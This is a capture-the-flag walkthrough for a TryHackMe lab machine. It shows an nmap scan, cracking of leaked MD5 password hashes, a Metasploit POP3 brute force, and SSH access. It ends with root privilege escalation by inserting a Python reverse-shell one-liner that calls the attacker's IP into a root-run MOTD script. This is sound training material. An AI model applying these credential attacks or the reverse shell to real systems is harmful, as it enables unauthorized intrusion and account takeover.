Fowsniff CTF

https://tryhackme.com/room/ctf

Task 1: Hack into the FowSniff organisation.

Deploy the machine. On the top right of this you will see a Deploy button. Click on this to deploy the machine into the cloud. Wait a minute for it to become live.

No answer needed

Using nmap, scan this machine. What ports are open?

Let's perform a scan using nmap.

$ nmap -sC -sV 10.10.251.22
Starting Nmap 7.92 ( https://nmap.org ) at 2023-12-17 08:35 IST
Nmap scan report for 10.10.251.22
Host is up (0.13s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 90:35:66:f4:c6:d2:95:12:1b:e8:cd:de:aa:4e:03:23 (RSA)
|   256 53:9d:23:67:34:cf:0a:d5:5a:9a:11:74:bd:fd:de:71 (ECDSA)
|_  256 a2:8f:db:ae:9e:3d:c9:e6:a9:ca:03:b1:d7:1b:66:83 (ED25519)
80/tcp  open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry 
|_/
|_http-title: Fowsniff Corp - Delivering Solutions
|_http-server-header: Apache/2.4.18 (Ubuntu)
110/tcp open  pop3    Dovecot pop3d
|_pop3-capabilities: CAPA SASL(PLAIN) USER UIDL AUTH-RESP-CODE RESP-CODES PIPELINING TOP
143/tcp open  imap    Dovecot imapd
|_imap-capabilities: post-login OK AUTH=PLAINA0001 have Pre-login more listed capabilities IMAP4rev1 IDLE SASL-IR ENABLE ID LITERAL+ LOGIN-REFERRALS
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 30.44 seconds

There are four open ports:

Port	Service
22	ssh
80	http
110	pop3
143	imap

No answer needed

Using the information from the open ports. Look around. What can you find?

We can visit the target using our browser.

No answer needed

Using Google, can you find any public information about them?

On searching for a while, we can find this page which has a bunch of the employees' passwords.

mauer@fowsniff:8a28a94a588a95b80163709ab4313aa4
mustikka@fowsniff:ae1644dac5b77c0cf51e0d26ad6d7e56
tegel@fowsniff:1dc352435fecca338acfd4be10984009
baksteen@fowsniff:19f5af754c31f1e2651edde9250d69bb
seina@fowsniff:90dc16d47114aa13671c697fd506cf26
stone@fowsniff:a92b8a29ef1183192e3d35187e0cfabd
mursten@fowsniff:0e9588cb62f4b6f27e33d449e2ba0b3b
parede@fowsniff:4d6e42f56e127803285a0a7649b5ab11
sciana@fowsniff:f7fd98d380735e859f8b2ffbbede5a7e

However these passwords are hashed.

No answer needed

Can you decode these md5 hashes? You can even use sites like hashkiller to decode them.

We can identify the hashes using hash-identifier.

$ hash-identifier 8a28a94a588a95b80163709ab4313aa4                                                  
--------------------------------------------------

Possible Hashs:
[+] MD5
[+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))

Similar to the first one all the rest are hashed using MD5 algorithm.

Now let's save the hashes in a file and use john to crack them.

$ john --format=Raw-MD5 --wordlist=/usr/share/wordlists/rockyou.txt hashes
$ john --format=Raw-MD5 --show hashes                                            
?:mailcall
?:bilbo101
?:apples01
?:skyler22?:scoobydoo2
?:carp4ever
?:orlando12
?:07011972

8 password hashes cracked, 1 left

Users
mauer
mustikka
tegel
baksteen
seina
stone
mursten
parede
sciana

Passwords
mailcall
bilbo101
apples01
skyler22
scoobydoo2
carp4ever
orlando12
07011972

For some reason john could not crack the hash of sixth password.

No answer needed

Using the usernames and passwords you captured, can you use metasploit to brute force the pop3 login?

Let's create the database and run msfconsole.

$ sudo msfdb run

We can now search for modules related to Pop3.

msf6 > search pop3

Matching Modules
================

   #  Name                                          Disclosure Date  Rank     Check  Description
   -  ----                                          ---------------  ----     -----  -----------
   0  auxiliary/server/capture/pop3                                  normal   No     Authentication Capture: POP3
   1  exploit/linux/pop3/cyrus_pop3d_popsubfolders  2006-05-21       normal   No     Cyrus IMAPD pop3d popsubfolders USER Buffer Overflow
   2  auxiliary/scanner/pop3/pop3_version                            normal   No     POP3 Banner Grabber
   3  auxiliary/scanner/pop3/pop3_login                              normal   No     POP3 Login Utility
   4  exploit/windows/pop3/seattlelab_pass          2003-05-07       great    No     Seattle Lab Mail 5.5 POP3 Buffer Overflow
   5  post/windows/gather/credentials/outlook                        normal   No     Windows Gather Microsoft Outlook Saved Password Extraction
   6  exploit/windows/smtp/ypops_overflow1          2004-09-27       average  Yes    YPOPS 0.6 Buffer Overflow

We will be using the fourth module. Let's select it using the following command:

msf6 > use 3
msf6 auxiliary(scanner/pop3/pop3_login) > 

Let's set up the module.

msf6 auxiliary(scanner/pop3/pop3_login) > set rhosts 10.10.251.22
rhosts => 10.10.251.22
msf6 auxiliary(scanner/pop3/pop3_login) > set user_file usernames.txt
user_file => usernames.txt
msf6 auxiliary(scanner/pop3/pop3_login) > set pass_file passwords.txt
pass_file => passwords.txt
msf6 auxiliary(scanner/pop3/pop3_login) > set verbose false
verbose => false

We are now all set to brute force the login.

msf6 auxiliary(scanner/pop3/pop3_login) > run

[+] 10.10.251.22:110            - 10.10.251.22:110 - Success: seina:scooby2

No answer needed

What was seina's password to the email service?

Answer

scoobydoo2

Can you connect to the pop3 service with her credentials? What email information can you gather?

• We can connect to the Pop3 service using nc.

$ nc 10.10.251.22 110    
+OK Welcome to the Fowsniff Corporate Mail Server!
user seina
+OK
pass scoobydoo2
+OK Logged in.

No answer needed

Looking through her emails, what was a temporary password set for her?

We can use the list command to list out the contents.

list
+OK 2 messages:
1 1622
2 1280
.

There are two messages. Let's read the first message using retr.

retr 1
+OK 1622 octets
Return-Path: <stone@fowsniff>
X-Original-To: seina@fowsniff
Delivered-To: seina@fowsniff
Received: by fowsniff (Postfix, from userid 1000)
        id 0FA3916A; Tue, 13 Mar 2018 14:51:07 -0400 (EDT)
To: baksteen@fowsniff, mauer@fowsniff, mursten@fowsniff,
    mustikka@fowsniff, parede@fowsniff, sciana@fowsniff, seina@fowsniff,
    tegel@fowsniff
Subject: URGENT! Security EVENT!
Message-Id: <20180313185107.0FA3916A@fowsniff>
Date: Tue, 13 Mar 2018 14:51:07 -0400 (EDT)
From: stone@fowsniff (stone)

Dear All,

A few days ago, a malicious actor was able to gain entry to
our internal email systems. The attacker was able to exploit
incorrectly filtered escape characters within our SQL database
to access our login credentials. Both the SQL and authentication
system used legacy methods that had not been updated in some time.

We have been instructed to perform a complete internal system
overhaul. While the main systems are "in the shop," we have
moved to this isolated, temporary server that has minimal
functionality.

This server is capable of sending and receiving emails, but only
locally. That means you can only send emails to other users, not
to the world wide web. You can, however, access this system via 
the SSH protocol.

The temporary password for SSH is "S1ck3nBluff+secureshell"

You MUST change this password as soon as possible, and you will do so under my
guidance. I saw the leak the attacker posted online, and I must say that your
passwords were not very secure.

Come see me in my office at your earliest convenience and we'll set it up.

Thanks,
A.J Stone


.

Answer

S1ck3nBluff+secureshell

In the email, who send it? Using the password from the previous question and the senders username, connect to the machine using SSH.

Let's read the second message.

ret 2
-ERR Unknown command: RET
retr 2
+OK 1280 octets
Return-Path: <baksteen@fowsniff>
X-Original-To: seina@fowsniff
Delivered-To: seina@fowsniff
Received: by fowsniff (Postfix, from userid 1004)
        id 101CA1AC2; Tue, 13 Mar 2018 14:54:05 -0400 (EDT)
To: seina@fowsniff
Subject: You missed out!
Message-Id: <20180313185405.101CA1AC2@fowsniff>
Date: Tue, 13 Mar 2018 14:54:05 -0400 (EDT)
From: baksteen@fowsniff

Devin,

You should have seen the brass lay into AJ today!
We are going to be talking about this one for a looooong time hahaha.
Who knew the regional manager had been in the navy? She was swearing like a sailor!

I don't know what kind of pneumonia or something you brought back with
you from your camping trip, but I think I'm coming down with it myself.
How long have you been gone - a week?
Next time you're going to get sick and miss the managerial blowout of the century,
at least keep it to yourself!

I'm going to head home early and eat some chicken soup. 
I think I just got an email from Stone, too, but it's probably just some
"Let me explain the tone of my meeting with management" face-saving mail.
I'll read it when I get back.

Feel better,

Skyler

PS: Make sure you change your email password. 
AJ had been telling us to do that right before Captain Profanity showed up.

.

The email was sent by baksteen which we can see in the From: field.

Let's connect using SSH.

$ ssh baksteen@10.10.251.22
baksteen@10.10.251.22's password: 

                            _____                       _  __  __  
      :sdddddddddddddddy+  |  ___|____      _____ _ __ (_)/ _|/ _|  
   :yNMMMMMMMMMMMMMNmhsso  | |_ / _ \ \ /\ / / __| '_ \| | |_| |_   
.sdmmmmmNmmmmmmmNdyssssso  |  _| (_) \ V  V /\__ \ | | | |  _|  _|  
-:      y.      dssssssso  |_|  \___/ \_/\_/ |___/_| |_|_|_| |_|   
-:      y.      dssssssso                ____                      
-:      y.      dssssssso               / ___|___  _ __ _ __        
-:      y.      dssssssso              | |   / _ \| '__| '_ \     
-:      o.      dssssssso              | |__| (_) | |  | |_) |  _  
-:      o.      yssssssso               \____\___/|_|  | .__/  (_) 
-:    .+mdddddddmyyyyyhy:                              |_|        
-: -odMMMMMMMMMMmhhdy/.    
.ohdddddddddddddho:                  Delivering Solutions


   ****  Welcome to the Fowsniff Corporate Server! **** 

              ---------- NOTICE: ----------

 * Due to the recent security breach, we are running on a very minimal system.
 * Contact AJ Stone -IMMEDIATELY- about changing your email and SSH passwords.


Last login: Tue Mar 13 16:55:40 2018 from 192.168.7.36
baksteen@fowsniff:~$ 

No answer needed

Once connected, what groups does this user belong to? Are there any interesting files that can be run by that group?

We can check which group the baksteen user belongs to using the following command:

baksteen@fowsniff:~$ id
uid=1004(baksteen) gid=100(users) groups=100(users),1001(baksteen)

As we can see baksteen belongs to the users group.

Now, let's find the files that can be run by the users group.

baksteen@fowsniff:~$ find / -group users -type f 2>/dev/null
/opt/cube/cube.sh

No answer needed

Now you have found a file that can be edited by the group, can you edit it to include a reverse shell?

Let's check what the file does.

printf "
                            _____                       _  __  __  
      :sdddddddddddddddy+  |  ___|____      _____ _ __ (_)/ _|/ _|  
   :yNMMMMMMMMMMMMMNmhsso  | |_ / _ \ \ /\ / / __| '_ \| | |_| |_   
.sdmmmmmNmmmmmmmNdyssssso  |  _| (_) \ V  V /\__ \ | | | |  _|  _|  
-:      y.      dssssssso  |_|  \___/ \_/\_/ |___/_| |_|_|_| |_|   
-:      y.      dssssssso                ____                      
-:      y.      dssssssso               / ___|___  _ __ _ __        
-:      y.      dssssssso              | |   / _ \| '__| '_ \     
-:      o.      dssssssso              | |__| (_) | |  | |_) |  _  
-:      o.      yssssssso               \____\___/|_|  | .__/  (_) 
-:    .+mdddddddmyyyyyhy:                              |_|        
-: -odMMMMMMMMMMmhhdy/.    
.ohdddddddddddddho:                  Delivering Solutions\n\n"

We can include the reverse shell that was provided to us with a few modifications:

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.17.48.138",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

No answer needed

If you have not found out already, this file is run as root when a user connects to the machine using SSH. We know this as when we first connect we can see we get given a banner (with fowsniff corp). Look in /etc/update-motd.d/ file. If (after we have put our reverse shell in the cube file) we then include this file in the motd.d file, it will run as root and we will get a reverse shell as root!

Let's start a nc listener on port 9999.

$ nc -nlvp 9999
listening on [any] 9999 ...

Let's login again using SSH.

ssh baksteen@10.10.251.22

If we check back on our listener, we will find that we have a reverse shell as root.

$ nc -nlvp 9999
listening on [any] 9999 ...
connect to [10.17.48.138] from (UNKNOWN) [10.10.251.22] 58062
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)

No answer needed